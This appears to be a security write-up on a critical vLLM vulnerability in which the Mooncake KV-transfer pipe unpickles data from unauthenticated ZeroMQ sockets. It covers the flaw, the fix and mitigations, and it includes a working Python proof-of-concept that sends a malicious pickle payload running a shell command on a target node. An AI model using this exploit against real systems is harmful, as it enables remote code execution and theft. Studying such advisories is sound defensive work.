Feb 21, 2026 · 6 min read
Critical RCE in vLLM's Mooncake integration (>= 0.6.5, < 0.8.5) caused by unsafe deserialization of untrusted data (Python pickle) over unauthenticated ZeroMQ sockets. Attackers can execute arbitrary code by sending a crafted packet to the exposed port.
In the race for blazing-fast LLM inference, security often takes a backseat to throughput. vLLM, the industry-standard engine for serving large language models, introduced a critical vulnerability in its 'Mooncake' distributed KV cache transfer system. By utilizing Python's insecure `pickle` serialization over unauthenticated ZeroMQ sockets bound to all network interfaces, the software exposed high-value GPU clusters to trivial Remote Code Execution (RCE). This flaw allows any attacker with network visibility to execute arbitrary system commands with the privileges of the vLLM process, earning it a rare and terrifying CVSS 10.0 score.
If you are running Large Language Models (LLMs) in production, you are probably using vLLM. It is the gold standard for high-throughput inference, managing memory paging (PagedAttention) like an operating system manages RAM. To make things even faster across distributed setups, the developers integrated Mooncake, a specialized architecture for transferring Key-Value (KV) caches between nodes. The goal? Reduce latency during prefill and decoding phases in distributed inference.
But here is the catch: Distributed systems require communication pipes. And when developers prioritize speed and "ease of implementation" over security hygiene, those pipes turn into open sewers. The Mooncake integration needed a way to send metadata between nodes. Instead of implementing a rigorous, schema-defined protocol, they opted for Python's built-in magic wand: pickle.
To make matters worse, this communication channel was built on ZeroMQ (ZMQ), a high-performance asynchronous messaging library. While ZMQ is powerful, it is also "batteries included"—and some of those batteries can explode if you don't read the warning label.
The vulnerability lies in `vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py`. The developers used `pyzmq`, the Python bindings for ZeroMQ. This library offers two helper methods that are the bane of Python security researchers everywhere: `send_pyobj()` and `recv_pyobj()`.
As the names suggest, these methods transmit generic Python objects. Under the hood, they simply call `pickle.dumps()` on the sender side and `pickle.loads()` on the receiver side. For the uninitiated: pickle is not a data format; it is a remote code execution engine. The pickle protocol allows objects to define how they are reconstructed using the `__reduce__` method. If you deserialize data from an untrusted source, that data can instruct the Python interpreter to `import os` and run `system('rm -rf /')` before the object is even fully instantiated.
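You can see the mechanism with nothing but the standard library. The sketch below uses a deliberately harmless callable (`str.upper`) in the `__reduce__` tuple where a real exploit would put `os.system`; the class name is made up for illustration:

```python
import pickle

class NotWhatItSeems:
    """A minimal, benign __reduce__ gadget (hypothetical demo class)."""
    def __reduce__(self):
        # pickle stores this (callable, args) pair, and pickle.loads()
        # CALLS it to "reconstruct" the object. An attacker substitutes
        # os.system and a shell command here.
        return (str.upper, ("code ran during deserialization",))

blob = pickle.dumps(NotWhatItSeems())
result = pickle.loads(blob)
print(result)  # → "CODE RAN DURING DESERIALIZATION"
```

Note that the "deserialized object" is not a `NotWhatItSeems` instance at all; it is whatever the attacker's callable returned. The code execution happens inside `pickle.loads()` itself.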
To compound the error, the ZMQ sockets were configured to bind to * (wildcard), which translates to 0.0.0.0—listening on all available network interfaces. There was no authentication, no encryption (CurveZMQ was not used), and no IP whitelisting. It was effectively a "Help Yourself" buffet for anyone who could ping the server.
Let's look at the vulnerable code. It's shockingly simple, which makes it so dangerous. The code blindly trusts whatever comes down the pipe.
Vulnerable Implementation (Before):
# In mooncake_pipe.py
# The socket binds to all interfaces (*)
self.receiver_ack.bind(f"tcp://*:{p_rank_offset + 2}")
# ... later in the loop ...
# Blocks until a message arrives, then blindly unpickles it
message = self.receiver_ack.recv_pyobj()

The Fix (After):
In version 0.8.5, the maintainers ripped out the pickle logic entirely. They switched to recv_multipart (handling raw bytes) and used Python's struct module to unpack specific, expected 64-bit integers. They also stopped binding to 0.0.0.0.
# In mooncake_pipe.py
import struct
# Bind only to the specific host IP (e.g., local or VPC IP)
self.receiver_ack.bind(f"tcp://{self.local_ip}:{p_rank_offset + 2}")
# ... later in the loop ...
# Receive raw bytes
msg_parts = self.receiver_ack.recv_multipart()
# Manually unpack expected binary format (Q = unsigned long long)
src_rank, length = struct.unpack("QQ", msg_parts[0])

This change eliminates the vulnerability in two ways: it removes the deserialization of arbitrary objects (killing the RCE vector) and reduces the attack surface by binding to specific interfaces.
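To see why the `struct`-based parsing closes the hole, here is a stdlib-only sketch. `struct.unpack("QQ", ...)` demands exactly two unsigned 64-bit integers (16 bytes); anything else, including a pickle stream, is rejected before any object is constructed:

```python
import struct

# What a legitimate peer sends: exactly two unsigned 64-bit ints.
wire = struct.pack("QQ", 3, 4096)
src_rank, length = struct.unpack("QQ", wire)

# A pickle payload has the wrong size: struct refuses it outright,
# so no attacker-controlled object is ever built.
try:
    struct.unpack("QQ", b"\x80\x04\x95attacker-bytes")  # 17 bytes, not 16
    rejected = False
except struct.error:
    rejected = True
print(src_rank, length, rejected)  # → 3 4096 True
```

This is the general lesson: parse, don't deserialize. A fixed binary schema can only yield integers, never code.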
Exploiting this does not require complex heap feng shui or race condition handling. It is a textbook serialization attack. The attacker simply needs to act as a ZMQ client and send a pickled object that defines a malicious __reduce__ method.
Here is what a researcher's Proof of Concept (PoC) looks like:
import zmq
import pickle
import os
# The payload class
class PwnState:
def __reduce__(self):
# When unpickled, this executes: /bin/sh -c 'id > /tmp/pwned'
return (os.system, ("id > /tmp/pwned",))
# 1. Connect to the vulnerable vLLM node
context = zmq.Context()
socket = context.socket(zmq.PUSH)
# The port is usually 8000 + rank_offset
target_ip = "192.168.1.50"
target_port = 8001
socket.connect(f"tcp://{target_ip}:{target_port}")
# 2. Serialize the payload
payload = pickle.dumps(PwnState())
# 3. Send it down the pipe
print(f"[*] Sending {len(payload)} bytes of doom to {target_ip}...")
socket.send(payload)
print("[+] Payload sent. Check your shell.")

Because vLLM usually runs with access to high-performance filesystems and potentially sensitive training data (or model weights), the impact of this RCE is catastrophic. It is game over.
RCE is always bad, but RCE in an AI infrastructure context is worse. These nodes are not running standard web apps; they are running on H100 or A100 GPUs, which cost upwards of $30,000 each.
1. Cryptojacking: The most immediate threat. Attackers can kill the inference process and hijack the GPUs to mine crypto. With the compute power available in a vLLM cluster, this is highly profitable.
2. Intellectual Property Theft: These servers often hold proprietary model weights or LoRA adapters that represent millions of dollars in R&D. An attacker can exfiltrate these files easily.
3. Supply Chain Poisoning: An attacker could modify the model weights in memory or on disk. Imagine an LLM that works perfectly 99% of the time, but has a backdoor trigger that makes it output specific misinformation or malicious code when prompted with a specific phrase.
4. Pivot Point: vLLM nodes are usually deep inside the network, often with access to data lakes (S3 buckets) and other internal services. This vulnerability turns the inference engine into a perfect beachhead for lateral movement.
The mitigation is straightforward but urgent.
1. Patch: Update vLLM to version 0.8.5 or later immediately. This version removes the `recv_pyobj` calls and enforces stricter socket binding.
2. Network Segmentation: Even with the patch, why are your inference nodes reachable from the internet? Ensure that the ports used for distributed communication (ZMQ ports) are firewalled off and only accessible by other nodes in the cluster. Use VPC Security Groups or iptables.
3. Configuration: If you are not explicitly using the Mooncake integration for distributed KV transfer, verify your configuration. The vulnerable code ships in the codebase, but it is only triggered when the Mooncake pipe is initialized.
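As a small defense-in-depth measure for the segmentation point above, a deploy script can refuse wildcard binds before they ever reach ZMQ. `safe_endpoint` below is a hypothetical helper, not part of vLLM:

```python
def safe_endpoint(host: str, port: int) -> str:
    """Hypothetical guard: build a ZMQ endpoint, refusing wildcard binds.

    '*' is ZMQ shorthand for all interfaces, and '0.0.0.0' / '::' are the
    IPv4/IPv6 unspecified addresses -- exactly the footgun in this CVE.
    """
    forbidden = {"*", "0.0.0.0", "::", ""}
    if host in forbidden:
        raise ValueError(f"refusing to bind all interfaces: {host!r}")
    return f"tcp://{host}:{port}"

print(safe_endpoint("10.0.0.12", 8001))  # → tcp://10.0.0.12:8001
```

Pair this with firewall rules: the helper stops accidental exposure, while VPC security groups or iptables stop deliberate probing.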
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| vLLM (vLLM Project) | 0.6.5 <= version < 0.8.5 | 0.8.5 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-502 (Deserialization of Untrusted Data) |
| CVSS v3.1 | 10.0 (CRITICAL) |
| Attack Vector | Network |
| EPSS Score | 3.07% (86th Percentile) |
| Impact | Remote Code Execution (RCE) |
| Protocol | ZeroMQ (ZMQ) |